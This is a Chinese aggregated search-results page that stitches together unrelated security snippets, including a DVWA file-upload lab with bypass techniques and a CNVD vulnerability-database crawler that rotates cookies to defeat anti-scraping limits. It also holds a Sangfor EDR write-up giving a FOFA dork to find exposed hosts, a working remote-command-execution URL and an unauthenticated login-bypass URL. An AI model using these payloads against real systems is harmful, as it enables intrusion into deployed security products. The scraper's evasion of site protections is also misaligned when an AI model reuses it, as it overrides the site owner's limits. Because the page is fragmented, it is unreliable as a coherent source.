精华内容
下载资源
问答
  • Android平台漏洞挖掘与利用

    千人学习 2015-10-30 15:33:25
    Android平台漏洞挖掘与利用视频教程,该课程将介绍几类漏洞的特征以及利用方法。本次课程将以Qualcomm平台上的CVE-2013-6123漏洞为例,介绍如何找出危险的数据交换代码,以及如何稳定利用任意地址写漏洞。也将介绍...
  • 2017年度安全报告--平台漏洞. 2017年度安全报告--平台漏洞. 2017年度安全报告--平台漏洞.
  • Apache解析漏洞 在Apache 1.x和Apache 2.x中1.php.rar会被当作php文件执行 Apache在解析文件时有一个原则当碰到不认识的扩展名时将会从后面向前解析直到碰到认识的扩展名为止如果都不认识则会暴露其源代码 这种方法...
  • DVWA平台 上传漏洞攻击手法 本地端js验证(本地端验证,下为服务端验证)可用浏览器关闭:判断:错误提示很快;审查元素看有无js代码 .htaccess 绕过限制上传,依据文件名包含的字符自定义解析文件。如下,只要...

    DVWA平台

    上传漏洞攻击手法

    本地端js验证(本地端验证,下为服务端验证)可用浏览器关闭:判断:错误提示很快;审查元素看有无js代码

    .htaccess 绕过限制上传,依据文件名包含的字符自定义解析文件。如下,只要文件名含php.gif就能解析该文件成php执行

    %00截断上传(%00截断规则:地址如遇上%00字符会自动截断.注意:使用%00截断时,务必将字符串%00采用url编码后上传.)

    文件头修改(老方式,同一类型的文件的文件头相同)

    文件类型修改

    Upload上传低等级代码

    <?php
        if (isset($_POST['Upload'])) {
    
                $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
                $target_path = $target_path . basename( $_FILES['uploaded']['name']);
    
                if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                    
                    echo '<pre>';
                    echo 'Your image was not uploaded.';
                    echo '</pre>';
                    
                  } else {
                
                    echo '<pre>';
                    echo $target_path . ' succesfully uploaded!';
                    echo '</pre>';
                    
                }
    
            }
    ?> 
    View Code

    Isset:是否设置,是否存在

    $_FILES:文件上传专用接受变量

    move_uploaded_file:移动文件函数

    $_FILES['uploaded']['name']:获取上传文件的名字

    1.没有验证文件上传类型,后缀名

    2.上传文件中客户端和服务端命名一致

    Upload上传中等级代码

    <?php
        if (isset($_POST['Upload'])) {
    
                $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
                $target_path = $target_path . basename($_FILES['uploaded']['name']);
                $uploaded_name = $_FILES['uploaded']['name'];
                $uploaded_type = $_FILES['uploaded']['type'];
                $uploaded_size = $_FILES['uploaded']['size'];
    
                if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
    
    
                    if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                    
                        echo '<pre>';
                        echo 'Your image was not uploaded.';
                        echo '</pre>';
                        
                      } else {
                    
                        echo '<pre>';
                        echo $target_path . ' succesfully uploaded!';
                        echo '</pre>';
                        
                        }
                }
                else{
                    echo '<pre>Your image was not uploaded.</pre>';
                }
            }
    ?> 
    View Code

    $_FILES['uploaded']['type'];:获取上传文件的类型

    $_FILES['uploaded']['size']; :获取上传文件的大小

    Upload上传高级代码(截取最后一个点后的字符串;识别%00)

    File Upload Source
    <?php
    if (isset($_POST['Upload'])) {
    
                $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
                $target_path = $target_path . basename($_FILES['uploaded']['name']);
                $uploaded_name = $_FILES['uploaded']['name'];
                $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
                $uploaded_size = $_FILES['uploaded']['size'];
    
                if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
    
    
                    if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                        
                        echo '<pre>';
                        echo 'Your image was not uploaded.';
                        echo '</pre>';
                    
                      } else {
                    
                        echo '<pre>';
                        echo $target_path . ' succesfully uploaded!';
                        echo '</pre>';
                        
                        }
                }
                
                else{
                    
                    echo '<pre>';
                    echo 'Your image was not uploaded.';
                    echo '</pre>';
    
                }
            }
    
    ?>
    View Code

     burpsuite:

    %00截断上传:

    正常文件地址:

    www.xxx.com/image/qq.jpg

    截断文件地址:

    www.xxx.com/image/qq.asp%00.jpg = www.xxx.com/image/qq.asp 

     

    经验:

    编辑器上传功能一般不要去尝试上传突破,没漏洞.

    采用网站自身的上传应用,尝试上传突破

     

    转载于:https://www.cnblogs.com/hyit/articles/5363400.html

    展开全文
  • 可以安装在Debian / Ubuntu上或通过Docker安装的多平台漏洞赏金工具包。 为什么要使用此工具包? 该工具包提供了一个可用于多平台的基础,因为该脚本可以安装在Linux上,使用Docker进行安装或安装在Windows上并带有...
  • 聚焦源代码安全,网罗国内外最新资讯! 近日,华为鲲鹏计算平台漏洞奖励计划合作伙伴授牌仪式在北京举行。奇安信代码安全实验室凭借出色的漏洞攻防研究能力获得授牌,与华为鲲鹏计算平台...

     聚焦源代码安全,网罗国内外最新资讯!

          近日,华为鲲鹏计算平台漏洞奖励计划合作伙伴授牌仪式在北京举行。奇安信代码安全实验室凭借出色的漏洞攻防研究能力获得授牌,与华为鲲鹏计算平台达成合作伙伴关系。双方将在漏洞攻防技术领域展开更加深入广泛的交流合作,共同为华为鲲鹏计算平台保驾护航。

           奇安信代码安全实验室是奇安信旗下,专注于软件源代码安全分析技术、二进制漏洞挖掘技术研究与开发的团队。实验室支撑国家级漏洞平台的技术工作,多次向国家信息安全漏洞库 (CNNVD)和国家信息安全漏洞共享平台 (CNVD)报送原创通用型漏洞信息;帮助微软、谷歌、苹果、Cisco、Juniper、Red Hat、Ubuntu、Oracle、Adobe、VMware、阿里云、飞塔、华为、施耐德、Mikrotik、Netgear、D-Link、Netis、以太坊公链等大型厂商或机构的产品发现了数百个安全漏洞。目前,实验室拥有国家信息安全漏洞库特聘专家一名,多名成员入选微软全球TOP安全研究者。在Pwn2Own 2017世界黑客大赛上,实验室成员获得Master of Pwn破解大师冠军称号。

    推荐阅读

    奇安信代码卫士帮助华为修复 Switch 系列设备的安全漏洞,获官方致谢

    奇安信代码安全实验室帮助微软修复两个 “重要” 漏洞,获官方致谢

    奇安信代码安全实验室招贤纳士

    题图:Pixabay License

    转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。

    奇安信代码卫士 (codesafe)

    国内首个专注于软件开发安全的

    产品线。

        觉得不错,就点个 “在看” 或 "” 吧~

    展开全文
  • 近期工作中需要爬取整个CNVD的漏洞库,之前写的爬虫是跑ICS.CNVD的库(见之前文章 工控安全:分享自己的工控爬虫项目—PySpider-ICS ),本以为改改就能用,没想到,CNVD主站有几道反爬虫机制,这里记录一下我的解决之...

    近期工作中需要爬取整个CNVD的漏洞库,之前写的爬虫是跑ICS.CNVD的库(见之前文章 工控安全:分享自己的工控爬虫项目—PySpider-ICS ),本以为改改就能用,没想到,CNVD主站有几道反爬虫机制,这里记录一下我的解决之法。

    初步分析

    首先,还是使用了我钟爱的爬虫框架——pyspider,但是写完之后,试了几次都只能获取十几个漏洞信息,然后就报错无法继续下去。看来CNVD是有反爬虫机制的,这种情况以后会越来越常见,那么接下来就分析一下反爬虫机制。
    这是CNVD的漏洞查询页:https://www.cnvd.org.cn/flaw/list.htm


    先看一下跳转下一页的数据包
    POST /flaw/list.htm?flag=true HTTP/1.1
    Host: www.cnvd.org.cn
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://www.cnvd.org.cn/flaw/list.htm
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 121
    Connection: close
    Cookie: xxxx
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    
    number=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%B2%BE%E7%A1%AE%E7%BC%96%E5%8F%B7&startDate=&endDate=&field=&order=&max=20&offset=20

    根据数据包可得知,CNVD进行下一页查询的操作是通过POST提交数据包的,而且其中数据包关键字段max=20&offset=20 offset表示查询漏洞数的偏移量,max代表显示当前页面的最大条数(经过测试,max设置100页面能显示100条,设置再大的值也是100条),其他字段爬虫用不到,直接删除不影响。


    自此,爬虫获取下一页的问题可以解决了,至于爬取页面漏洞URL,并进入漏洞详情页爬取具体数据的操作,无非是数据提取与格式化,也无需过多讨论(基操勿6皆坐)。

    深入分析

    接下来是解决CNVD对cookie字段的反爬虫限制。

    经过测试,猜测:CNVD对相同的cookie值,只允许获取十几个漏洞详情页面,所以要解决cookie动态更新的问题。
    这里我使用kali作为运行基础环境(爬虫在linux系统下稳定点,尤其是有中文的时候)
    接下来就是要通过chromedirver来自动化访问CNVD页面来更新cookie,
    下载地址:   https://npm.taobao.org/mirrors/chromedriver

    使用chromedriver要保证有chrome浏览器,且保证下载的版本号基本保持一致

    chromedriver安装方法:
    将下载的文件移动到系统目录去:sudo mv chromedriver /usr/local/bin/chromedriver
    改变用户执行的权限:sudo chmod u+x,o+x /usr/local/bin/chromedriver
    检验是否正常使用:chromedriver --version

    源码解释

    下面先贴上代码

    # -*- coding: utf-8 -*-
    import requests
    from lxml import etree
    import csv
    import time
    import random
    from collections import OrderedDict
    import codecs
    from datetime import date
    from multiprocessing.dummy import Pool as Threadpool
    # from sqlalchemy.ext.declarative import declarative_base
    # from sqlalchemy import Column, Integer, String, ForeignKey, TEXT, Index, DATE
    # from sqlalchemy.orm import sessionmaker, relationship
    # from sqlalchemy import create_engine
    from selenium import webdriver
    from selenium.webdriver.chrome.options import Options
    import ast
    
    #Base = declarative_base()
    
    
    # class Cnvdtable(Base):
    #     __tablename__ = 'cn_table'
    
    #     id = Column(Integer, primary_key=True)
    #     cn_url = Column(String(64))
    #     cn_title = Column(TEXT)
    #     cnvd_id = Column(String(32))
    #     pub_date = Column(DATE)
    #     hazard_level = Column(String(32))
    #     cn_impact = Column(TEXT)
    #     cve_id = Column(String(32))
    #     cn_describe = Column(TEXT)
    #     cn_types = Column(String(64))
    #     cn_reference = Column(String(512))
    #     cn_solution = Column(String(512))
    #     cn_patch = Column(TEXT)
    
    #     __table_args__ = (
    #         Index('cn_url', 'cnvd_id'),
    #     )
    
    
    # engine = create_engine(
    #     "mysql+pymysql://root:[email protected]/scrapy?charset=utf8", max_overflow=5)
    
    # Base.metadata.create_all(engine)
    # Session = sessionmaker(bind=engine)
    # session = Session()
    
    
    class Cnvdspider(object):
        def __init__(self):
            self.headers = {
                "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.16 Safari/537.36"}
            # 如果从某处断线了,可以更改起始的url地址
            #self.start_url = "http://www.cnvd.org.cn/flaw/list.htm"
            self.count = 0
            self.cookies = self.get_cookies()
    
        def get_cookies(self):
            chrome_options = Options()
            # 加上下面两行,解决报错
            chrome_options.add_argument('--no-sandbox')
            chrome_options.add_argument('--disable-dev-shm-usage')
            driver = webdriver.Chrome(chrome_options=chrome_options)
            driver.get("https://www.cnvd.org.cn/flaw/list.htm?max=20&offset=20")#设置每次ChromeDriver访问的初始页面用来更新cookie,以绕过cnvd爬虫限制
            cj = driver.get_cookies()
            cookie = ''
            for c in cj:
                cookie += "'"+c['name'] + "':'" + c['value'] + "',"
            cookie = ast.literal_eval('{'+cookie+'}')
            driver.quit()
            return cookie
    
        def parse(self, i):
            time.sleep(random.randint(2, 5))
            self.count += 1
            print(self.count)
            if(self.count == 5):
                self.cookies = self.get_cookies()
                self.count = 0
            url='https://www.cnvd.org.cn/flaw/list.htm?%s' % str(i)
            html = requests.post(url, data={'max': 100, 'offset': str(i)}, headers=self.headers,
                                cookies=self.cookies).content.decode()#当前的CNVD设置了只能POST提交数据,这里把max设置成100,这也是cnvd能在一个页面显示的最大漏洞信息条数,默认是20条,这样能减少查询页数。
            html = etree.HTML(html)
            return html
    
        def parse2(self, url):
            time.sleep(random.randint(2, 5))
            self.count += 1
            print(self.count)
            if(self.count == 5):
                self.cookies = self.get_cookies()
                self.count = 0
            html = requests.get(url, headers=self.headers,
                                cookies=self.cookies).content.decode()
            html = etree.HTML(html)
            return html
    
        def get_list_url(self, html):
            list_url = html.xpath("//div[@id='flawList']/tbody/tr/td[1]/a/@href")
            if list_url is None:
                list_url = html.xpath(
                    "//div[@class='blkContainerPblk']//table[@class='tlist']/tbody/tr/td[1]/a/@href")
            for url in list_url:
                url = "http://www.cnvd.org.cn" + url
                self.parse_detail(url)
            # next_url = html.xpath(
            #     "//a[@class='nextLink']/@href")[0] if html.xpath("//a[@class='nextLink']/@href") else None
            # if next_url:
            #     next_url = "http://www.cnvd.org.cn" + next_url
            # return next_url
    
        def parse_detail(self, url):
            time.sleep(random.randint(2, 5))
            html = self.parse2(url)
            # item = OrderedDict()  # 如果要存入csv文档,建议用有序字典
            item = {}
            # URL
            item["cn_url"] = url
            # 获取漏洞标题
            item["cn_title"] = html.xpath(
                "//div[@class='blkContainerPblk']/div[@class='blkContainerSblk']/h1/text()")
            if item["cn_title"]:
                item["cn_title"] = html.xpath("//div[@class='blkContainerPblk']/div[@class='blkContainerSblk']/h1/text()")[
                    0].strip()
            else:
                item["cn_title"] = 'Null'
    
            # 获取漏洞公开日期
            # item["date"] = html.xpath("//td[text()='公开日期']/following-sibling::td[1]/text()")
            item["pub_date"] = html.xpath(
                "//div[@class='tableDiv']/table[@class='gg_detail']//tr[2]/td[2]/text()")
            if item["pub_date"]:
                item["pub_date"] = "".join(
                    [i.strip() for i in item["pub_date"]])
            #    item["pub_date"] = self.convertstringtodate(item["pub_date"])
            else:
                item["pub_date"] = '2000-01-01'
            #    item["pub_date"] = self.convertstringtodate(item["pub_date"])
    
            # 获取漏洞危害级别
            item["hazard_level"] = html.xpath(
                "//td[text()='危害级别']/following-sibling::td[1]/text()")
            if item["hazard_level"]:
                item["hazard_level"] = "".join(
                    [i.replace("(", "").replace(")", "").strip() for i in item["hazard_level"]])
            else:
                item["hazard_level"] = 'Null'
    
            # 获取漏洞影响的产品
            item["cn_impact"] = html.xpath(
                "//td[text()='影响产品']/following-sibling::td[1]/text()")
            if item["cn_impact"]:
                item["cn_impact"] = "   ;   ".join(
                    [i.strip() for i in item["cn_impact"]])
            else:
                item["cn_impact"] = 'Null'
    
            # 获取cnvd id
            item["cnvd_id"] = html.xpath(
                "//td[text()='CNVD-ID']/following-sibling::td[1]/text()")
            if item["cnvd_id"]:
                item["cnvd_id"] = "".join(
                    [i.strip() for i in item["cnvd_id"]])
            else:
                item["cnvd_id"] = 'Null'
    
            # 获取cve id
            item["cve_id"] = html.xpath(
                "//td[text()='CVE ID']/following-sibling::td[1]//text()")
            if item["cve_id"]:
                item["cve_id"] = "".join(
                    [i.strip() for i in item["cve_id"]])
            else:
                item["cve_id"] = 'Null'
    
            # 获取漏洞类型
            item["cn_types"] = html.xpath(
                "//td[text()='漏洞类型']/following-sibling::td[1]//text()")
            if item["cn_types"]:
                item["cn_types"] = "".join(
                    [i.strip() for i in item["cn_types"]])
            else:
                item["cn_types"] = 'Null'
    
            # 获取漏洞描述
            item["cn_describe"] = html.xpath(
                "//td[text()='漏洞描述']/following-sibling::td[1]//text()")
            if item["cn_describe"]:
                item["cn_describe"] = "".join(
                    [i.strip() for i in item["cn_describe"]]).replace("\u200b", "")
            else:
                item["cn_describe"] = 'Null'
    
            # 获取漏洞的参考链接
            item["cn_reference"] = html.xpath(
                "//td[text()='参考链接']/following-sibling::td[1]/a/@href")
            if item["cn_reference"]:
                item["cn_reference"] = item["cn_reference"][0].replace('\r', '')
            else:
                item["cn_reference"] = 'Null'
    
            # 获取漏洞的解决方案
            item["cn_solution"] = html.xpath(
                "//td[text()='漏洞解决方案']/following-sibling::td[1]//text()")
            if item["cn_solution"]:
                item["cn_solution"] = "".join(
                    [i.strip() for i in item["cn_solution"]])
            else:
                item["cn_solution"] = 'Null'
    
            # 获取漏洞厂商补丁
            item["cn_patch"] = html.xpath(
                "//td[text()='厂商补丁']/following-sibling::td[1]/a")
            if item["cn_patch"]:
                for i in item["cn_patch"]:
                    list = []
                    try:
                        list.append(i.xpath("./text()")[0])
                        list.append("http://www.cnvd.org.cn" + i.xpath("./@href")[0])
                        item["cn_patch"] = list[0] + ':' + list[1]
                    except IndexError:
                        pass            
            else:
                item["cn_patch"] = 'Null'
    
            print(item)
            # 保存数据到csv
            self.save_data(item)
    
        def convertstringtodate(self, stringtime):
            "把字符串类型转换为date类型"
            #  把数据里的时间格式替换成数据库需要的格式。日期格式,便于后期提取数据,
            if stringtime[0:2] == "20":
                year = stringtime[0:4]
                month = stringtime[4:6]
                day = stringtime[6:8]
                if day == "":
                    day = "01"
                begintime = date(int(year), int(month), int(day))
                return begintime
            else:
                year = "20" + stringtime[0:2]
                month = stringtime[2:4]
                day = stringtime[4:6]
    
                begintime = date(int(year), int(month), int(day))
                return begintime
    
        def save_data(self, item):
            # 数据保存进csv,此处可以打开,存txt类似
            with open("./cnvd-1290ye.csv", "a") as f:
                writer = csv.writer(f, codecs.BOM_UTF8)
                c = []
                for i in item.values():
                    c.append(i)
                writer.writerow(c)
    
            # dic = dict(item)
            # obc = Cnvdtable(
            #     cn_url=dic['cn_url'],
            #     cn_title=dic['cn_title'],
            #     cnvd_id=dic['cnvd_id'],
            #     cve_id=dic['cve_id'],
            #     pub_date=dic['pub_date'],
            #     cn_types=dic['cn_types'],
            #     hazard_level=dic['hazard_level'],
            #     cn_impact=dic['cn_impact'],
            #     cn_describe=dic['cn_describe'],
            #     cn_reference=dic['cn_reference'],
            #     cn_solution=dic['cn_solution'],
            #     cn_patch=dic['cn_patch'],
            # )
            # session.add(obc)
            # session.commit()
            #print("\n"+dic['cn_title']+" ==============存储成功\n")
    
        def run(self):
    
            #每次 i 递增100位
            for i in range(128900,129900,100): #如果因为一些原因导致脚本报错中断,重新运行时需要重新设置范围,根据post页面信息来定位报错的页数
                html = self.parse(i)
                print(i) #页数
                next_url = self.get_list_url(html)
                print(next_url)
    
    
    
    if __name__ == "__main__":
        a = Cnvdspider()
        pool = Threadpool(1)  # 单线程跑的慢,但是基本很稳定没有被cnvd封杀。本次跑完整个cnvd库大概十天左右,期间网络波动中断需要维护代码,及爬虫重新爬的页面范围。
        a.run()
        # pool.map(a.run(),self.parse())
        pool.close()
        pool.join()

    上述代码,是根据在GitHub上搜索出的几个cnvd爬虫,再根据实际运行情况进行修改出的:
    注释了录入mysql数据库的代码
    修改爬虫获取下一页的方式(也就是文章开头内容)
    再修改了提取漏洞详情页的数据提取方法
    等等......具体看源码中的注释吧
    下面放一下最后录入到数据库的情况

    展开全文
  • 针对基础设施即服务云计算平台多目标虚拟机的漏洞扫描问题,设计一个多代理分布式漏洞扫描系统,提出一种分布式漏洞扫描任务分配算法.所设计的系统包括控制中心模块和检测代理模块,控制中心控制检测代理运行及分配...
  • 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端...

     

     


    0x01 前言

    深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。


    提示:以下是本篇文章正文内容,下面案例可供参考

    0x02 影响范围

    fofa关键字搜索:title=”终端检测响应平台”

     

    0x03 远程命令执行

    漏洞位置:host 参数

    https://xxx.com:xxx/tool/log/c.php?strip_slashes=system&host=id

     

    https://xxx.com:xxx/tool/log/c.php?strip_slashes=system&host=pwd

    0x04 RCE分析

     echo "<p><b>Log Helper</b></p>";

        $show_form($_REQUEST);

    跟入show_form

        /**

         * 显示表单

         * @param array $params 请求参数

         * @return

         */

        $show_form = function($params) use(&$strip_slashes, &$show_input) {

            extract($params);

            $host  = isset($host)  ? $strip_slashes($host)  : "127.0.0.1";

    任意文件下载漏洞

    验证码绕过


    展开全文
  • 分析某金属交易平台后台管理软件,利用SQL注入达到提权目的(演示敏感内容将会打码处理)。 工具 1..net framework 2. ExeinfoPe 3..Net Reflector 漏洞分析 首先我们登录软件查看软件有哪些...
  • 深信服edr 2020HW 0day 远程命令执行漏洞 远程代码执行漏洞 任意用户登陆漏洞 免密码登陆 Payload 使用浏览器访问 https://ip:prot/ui/login.php?user=任意字符 原文链接 远程命令执行 使用浏览器访问 ...
  • 系统平台漏洞扫描知识积累

    千次阅读 2017-05-13 15:17:20
    1、启用了不安全的HTTP方法 一般这种情况,出现了多余的http的url访问,http://192.168.*.*:8080 如tomcat的管理平台访问,需要屏蔽 2、
  • 央广网北京12月6日消息 据经济之声《天天315》报道,消费者一个月内被19次盗刷,第三方支付平台漏洞多,消费者需提高警惕;乘客未乘车却收到滴滴快车车费账单,滴滴快车司机称发账单是为了能继续接单,消费者愤而...
  • 在2013中国互联网安全大会上,安天实验室高级研究员肖梓航在演讲中分析了Android漏洞的攻防趋势。在漏洞方面Android平台面临5大问题,同时肖梓航给出了Android软件保护的趋势。
  • //国家应急中心漏洞公告页面 String leakUrl = "https://www.cert.org.cn/publish/main/9/index.html"; //处理第一页的源码 Document leakListDoc = sendHttp(leakUrl); int page = 1; System.out...
  • 聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队一名白帽黑客发现了 HackerOne 平台上的一个严重漏洞,可导致用户的邮件地址遭暴露,他为此赢得8500美元的奖励金。本月...
  • 360安全卫士 · 2016/01/04 14:20Author:[email protected]0x00 前言近日,在新闻中...于是就在市面上购买了一些GPS定位设备进行研究,研究发现这些GPS定位系统后台采用的是通用的一套程序,其云平台上存在多个高...
  • 不多说了,直接上payload: payload: https://ip/ui/login.php?user=任意发挥 比如说: payload: https://10.0.0.12/ui/login.php?user=admin 竟然直接可以登录平台!简直是滑天下之大稽。 作为安全公司,内心的...
  • 说起点外卖,你说我们干饭人容易吗???点个外卖吧,为了便宜点忍痛开个会员,好去领抵扣红包外卖送到了吧,还被各种偷外卖的人偷拿,防不胜防卑微的干饭人只想吃一顿饭啊TAT然而,12月初的时候...
  • Android平台漏洞挖掘与利用—7747人已学习 课程介绍    演讲嘉宾:吴家志,奇虎360开发组长/工程师/技术讲师 课程收益  本次公开课将介绍几类漏洞的特征以及利用方法。本次课程将以Qualcomm平台上的CVE-2013-...
  • VMWare发布安全通告VMSA-2017-0010,通告称vSphere Data Protection (VDP)出现多个漏洞,包括Java反序列化问题CVE-2017-4914 本地保存可逆凭据问题CVE-2017-4917。官方已经发布解决方案,用户需要尽快确认。绿盟科技...
  • 初识SRC漏洞平台提交漏洞

    万次阅读 多人点赞 2019-03-08 22:05:31
    1.1 漏洞平台 补天漏洞响应平台:https://butian.360.cn/ 漏洞银行:https://www.bugbank.cn/ 阿里云漏洞响应平台:https://security.alibaba.com/ i春秋SRC部落:https://www.ichunqiu.com/src 腾讯应急响应...
  • 1漏洞平台 2网站情况 3发现/提交漏洞 4思路总结 1漏洞平台 漏洞银行 https://www.bugbank.cn/ 漏洞盒子 https://www.vulbox.com/ i春秋SRC部落 https://www.ichunqiu.com/src 补天漏洞响应平台 ...
  • 漏洞练习平台

    2020-10-09 21:44:04
    WebGoat漏洞练习平台: https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台: https://github.com/WebGoat/WebGoat-Legacy zvuldirll漏洞练习平台: https://github.com/710leo/ZVulDrill vulapps漏洞...
  • 漏洞靶场平台搭建与漏洞分析文档,里面包含漏洞靶场网站的搭建、漏洞分析、工具使用、漏洞脚本样例,来源是红日安全,大家一起学习,进步!
  • 漏洞发布平台

    2021-01-13 10:38:33
    为了挖掘漏洞,首先要复现漏洞学习漏洞的思路,下面列举一些漏洞发布平台,便于搜集信息和代码,复现漏洞。 首先明确几个概念: CVE(Common Vulnerabilities & Exposures):公共漏洞和暴露,CVE是一个字典表...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 6,542
精华内容 2,616
关键字:

平台漏洞